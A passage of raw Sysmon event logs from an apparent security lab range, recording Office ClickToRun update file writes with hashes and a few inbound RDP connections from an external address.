Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MORPH9.DLLMD5=65AE9C6819581C0C133B09CC8E291737,SHA256=9EA76062E0C10ED607D05969394E9080A305404805057DF20FB13D4ED515BAF5,IMPHASH=BF1E57D60D225EAF3AA9EF0F22E2192Btruetrue 23542300x800000000000000070066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MML2OMML.XSLMD5=BC083C752B20867ADB7DF8FF301C15E8,SHA256=5558E69D8BD6534927C4176BD5D5032D0D4BDC17BDAAB7DE580CA41E996A609B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MLCFG32.CPLMD5=BB360D91F878D724BE5627B007DBCC1E,SHA256=E17D6C6DD0D0014ABB6EDC687CECC72B296106852B2651C4E6CEFB9BE5FE52D9,IMPHASH=CC01157795B0E132FDD6CA87FD6940EFtruetrue 23542300x800000000000000070064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\misc.exeMD5=43E77CAEE195C1B419B7DC0E631430D7,SHA256=C10E215C2BA28FB1E1F3B0D78E28633680DA569AF5AA25A49F33AF1452D99DE5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MINSBROAMINGPROXY.DLLMD5=BAFBECBD71835E31F4C3EC51EFD052CD,SHA256=48EC0A87AECC08AAEDB456DF539C70683531FCD685205BB19EBA63A85AC80C67,IMPHASH=905325600A0D71B21E72E4E7A2EE2DCFtruetrue 23542300x800000000000000070062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MINSBPROXY.DLLMD5=5ED403CE5D873BE5B3839A104EDCABB6,SHA256=6F14C94C75071151710D0C5B461B7F8A22E8BED78BD1DAA8A634564E73A6EB5B,IMPHASH=905325600A0D71B21E72E4E7A2EE2DCFtruetrue 23542300x800000000000000070061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MIMEDIR.DLLMD5=0CBE54AB1A38C3371F9B1B2224FCBBB8,SHA256=FF70293D35C77DE9B22CB52666D2B90689FA8939BD02E013DBC2DBE71AE6A5FD,IMPHASH=90F74C40E0CF393D0926A149A8C7780Ftruetrue 23542300x800000000000000070060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Microsoft.Office.PolicyTips.dllMD5=198A903CF295AF4A8647755361006510,SHA256=772987196893F0E7C49BB0691920B2D9E6582DBEE4D63026BE8732529CBD3194,IMPHASH=57C04F0B8E0E7411F240C1379860A618truetrue 23542300x800000000000000070059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Microsoft.Lync.Utilities.zipMD5=DB44A76056EF9C0EAD119BFEA7C19AF7,SHA256=91191D72C5E555AA11046FC67808397195D238F11FEA313D160C49732D7E9935,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Microsoft.Lync.Utilities.Controls.zipMD5=7BD0343DB77E4ECB81FA0D44278D7D41,SHA256=005FB8C314477631A0B45458F5105703C9651D3AF4FF3483A93BDAC3DB4B1E41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Microsoft.Lync.Model.zipMD5=CAFA330F942B91A4C754FA631F95237B,SHA256=EAC2F4228ADF19EA7E64A2CC2AE634FCAAF2ABB82DEF24942A4B32D382BCFCD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Microsoft.Ink.Recognition.DLLMD5=AC692EFAFA496DA5A301CAD2E73BE25C,SHA256=3A9BFE424EE31BE09E700A86922353587DFBC7D1C0BE7153DC7A60ACBF2CDAA0,IMPHASH=34AA1F16AEAEEA074467ED7A2CCC8278truetrue 23542300x800000000000000070055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mfc140u.dllMD5=C6A732F23B907BC6D37982F47F4B4453,SHA256=C8DAB45709404E6607B21A641895C6B6953550780B2245C3792E64244A10DA8E,IMPHASH=D774F0CF6BA79D3B787D3AE2DC21DC54truetrue 23542300x800000000000000070054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MeetingJoinAxOC.dllMD5=02AD49A3147CC8057C558F54D5397C07,SHA256=F2C6BD11D9D5A9F31D218D697F2FE6A6A93BC0AC637DBB2CB0D295950BE33649,IMPHASH=AC3A212C5529E67E4A29343260C79A42truetrue 23542300x800000000000000070053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\McePerfCtr.manMD5=5057E2BD27A1DDCBABC7BB51F39D5607,SHA256=C9C198207956EA4E4568D13B0FEB8AB8623539B50F3B061BD06DFABA571CEEA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mce.dllMD5=366D59DC86E5F484B9D1B9D748D8F983,SHA256=9976AC83DD5ECF1CC8A2313B942CF3E3309586B1F8155DA851448BC6CBD9DCD4,IMPHASH=6A059D345DAE9CC4A80F24B19B9D85BEtruetrue 23542300x800000000000000070051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MAPISHELL.DLLMD5=863AB9B3F2CADA9B0AD2A336CEDE4F00,SHA256=07AD0C44EAB9A28B401771438F5BB721B110D55D3658E3F6B6F027C721ED68FC,IMPHASH=7425C14651D491F8966AC488CE05C757truetrue 23542300x800000000000000070050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MAPIPH.DLLMD5=F0969E7B05CE836D2EC9ED1FF18AB8E4,SHA256=A5BEFE18AA833C150C616EF0132601D92FE60C919955A9164E5589F18568F103,IMPHASH=115311A34BA0042AA5594FCCD78B68DAtruetrue 23542300x800000000000000070049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MANIFEST.XMLMD5=0ADF7941B8353413387F25895CA3B233,SHA256=EA7B087EDBBBBF29376A198635E2FDB9D5985CFC3B46FC5C50088E92BCEEC25A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lyncModelProxy.dllMD5=021B48F064BEE8A68F53116FE1449670,SHA256=438175261798EF8DF4A18535F0732774BDB6699F1F118CD8F0D9EB2F85A71322,IMPHASH=79C387E1EA024D24BC14E9AB3C51A4BCtruetrue 23542300x800000000000000070047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lynchtmlconvpxy.dllMD5=45AA2B7E2D15CCE20B8A998D34FF260B,SHA256=57B78D4970874E08E5A2186FFB50090E6BE000CF655FB00BC283CEABEBA3048C,IMPHASH=6AB2281946989A3D4BC3C602F11D43B4truetrue 23542300x800000000000000070046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lynchtmlconv.exeMD5=52729451AE229698E8588EE668DB6F3A,SHA256=1B42B4CBEB6DF5EECD8C89E30F0219B08140F9C53F09F3924ED79D028A14189C,IMPHASH=CBA3662F675AB1633CC788EA0D5D50DAtruetrue 354300x800000000000000070045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.335{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-38593-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lyncDesktopViewModel.dllMD5=8BB4D6E0799787BB82BC493718968FFD,SHA256=5E1D4AAF750E4947A589427CFDF0235C581C052E98B7B9FF5BB4A387086656BC,IMPHASH=C5FDD81935D92FC7DF594DB4E0354B97truetrue 23542300x800000000000000070043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LyncDesktopSmartBitmapResources.dllMD5=BBC28DDD38089E17B058A01797793CCA,SHA256=3751835B5515586B36465FFD7871FD5A76375AB25C08AA4C1D16DEC415623610,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049772Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:30.976{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36DE8CCBA83D5A43F423B8514DB3BBCF,SHA256=19B834E5473A2EE8834BC14637D991684645ACC1712D93D5634BDDBCCDA275CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049771Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:27.133{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60287-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000070117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSTYLE.DLLMD5=68AF7E9713A4023CB0036BA6638A72AD,SHA256=DE06879E2E20E43FF01E3BF89F141EBA93C4D3E7526C699AD2A66E08A16B1A69,IMPHASH=E323EF720878987AFAFA694DFB1EA5DCtruetrue 23542300x800000000000000070116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSREC.EXEMD5=4E1EABFE1B8168F784AF47F1ECBBED8C,SHA256=0BEA084D00EF703B77BCB1E06F73AF63F71ACEF835D8DEFF187F7CB2130D0495,IMPHASH=6B84F0121B43117814919F0967858AACtruetrue 23542300x800000000000000070115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSPECTRE.DLLMD5=F7B9E40638D3A8AC4F3BDE15A2BDF711,SHA256=9496527C93B85F72CEC57BF595E015C5C2AACC48B399CAC46999090ED68111D0,IMPHASH=5DC94BE8B860C2BBFFC77786248049C4truetrue 23542300x800000000000000070114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSB.DLLMD5=0DEF00A02875DB15C00E50022AB8CA07,SHA256=C52D11E0B2E8680FFAB4DED5AD30481CCF5DE02B207D454B5B395D5220DA3FB8,IMPHASH=C356FDFAB2663BEC750F0668B49258B9truetrue 23542300x800000000000000070113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoianetutil.dllMD5=A723596C7086B3B77EC7413FDCD2E10A,SHA256=461ADD1F3ECC02739A0EC57DDD186F676FCB37C67A6FE03E0C09358F99DF35F4,IMPHASH=EDE8D78424EBBF4094854B613BC1F03Ftruetrue 23542300x800000000000000070112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoia.exeMD5=4FAED7216F0C0F73C889588FB41834FE,SHA256=06E50DE45492F3A33A78361B38BF41AD102E9EBB7517566455346B0D1C287AD5,IMPHASH=7F98EFC4CB68608D74256A99365FFEA9truetrue 23542300x800000000000000070111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOHTMED.EXEMD5=D4D95C17C823F5BFA99BABDFEB4C0401,SHA256=62FEC8EA476BE354C88FD43700F332FA136491E8567A43BE8443A1A96DE14000,IMPHASH=EEDA06403CAF7E18169D0BE7C1BD9425truetrue 23542300x800000000000000070110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOHEVI.DLLMD5=988F781E33C6D80FAB67BBA5CF9B9734,SHA256=E24FA29DE3B8AFF91A288B45C125306FC1A7C583112E738E484A2A4F92F29CF1,IMPHASH=C49F3ADA6C8B255248E276E60842F577truetrue 23542300x800000000000000070109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOHEV.DLLMD5=AF34410FB9D826B606BF1A322620ECB9,SHA256=66EDAD7D49184463391824F47B4EF6D1BCECB887218BCEEBB993598261393E8F,IMPHASH=90973FE2EDC958A9F07F6714EC287784truetrue 23542300x800000000000000070108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoev.exeMD5=B9152E4EBB119694579A3C292F84F67D,SHA256=0A65820B604D601DB12E4D633211BE557CB493B17BB19E39488C9EBB6B678064,IMPHASH=59941493298B9F48DE0F171ECC000F65truetrue 23542300x800000000000000070107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoetwres.dllMD5=617C01B3D5109EDFBC1EB5358AD2BD94,SHA256=0A07AFC77C67134BFE612087775D8D6429F31DADAE62FE3818419CF2DD03AFA6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOCRRES.ORPMD5=1337603C99A01BA5379B324B6F5429CF,SHA256=CA2FEE4A3D7A823D4E6FEF6E20AE5D2DF41FACECD2F86BF5FDB1EA03899D839F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000070105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.767{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-39958-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOCR.DLLMD5=0073B193ED625FFEF47AB4BC40E8676A,SHA256=20C410D4EABD7668B4F4D015EB96240CDF951472A9389999AD0C7EAA78EFE0D0,IMPHASH=E5DA58548DC7D876245184C92971AC41truetrue 23542300x800000000000000070103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoasb.exe.manifestMD5=0EDEF786FC6040BC0DF05D4A16AB0165,SHA256=361FF22EBDA2976E3FF486ADEC9B7E10D77F5CF47B296EE1C5E166D4C29A9702,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoasb.exeMD5=C4765D9FAB6BEE23EC09080075A8E832,SHA256=9AC2C5E641DA999690F246B5BC4562535D7813AAC0DD047221F8940F1B302006,IMPHASH=5DC048607D9232E34F1CD1BDAA809053truetrue 23542300x800000000000000070101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOARIANEXT.DLLMD5=C13EAF12A885E750D8486BA22C2B3FE4,SHA256=04D8175A8BBD92B47BC3ACDE08BCB8F253AE0ABAE13AA797DACFF4414BB4A3EA,IMPHASH=B781081738FD8F0F3F50AC9339F5C8A7truetrue 23542300x800000000000000070100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOARIACAPI.DLLMD5=52076C55AB1AE7D2E71BE1A884903154,SHA256=E353A3D99216B5B06A8A21931538642CFEDDA10D219E6E32E0811C306790FAC3,IMPHASH=C187943C88BFC58E271B0CCF826DD8EFtruetrue 23542300x800000000000000070099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOARIA.DLLMD5=075F94DBD44477623CA2629F67A28C63,SHA256=7E32AD6955265A798568940B30EEE08891972809507272665314555D06632E83,IMPHASH=FA82F5AB6D9155F174A1DFFD488A7FC0truetrue 23542300x800000000000000070098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 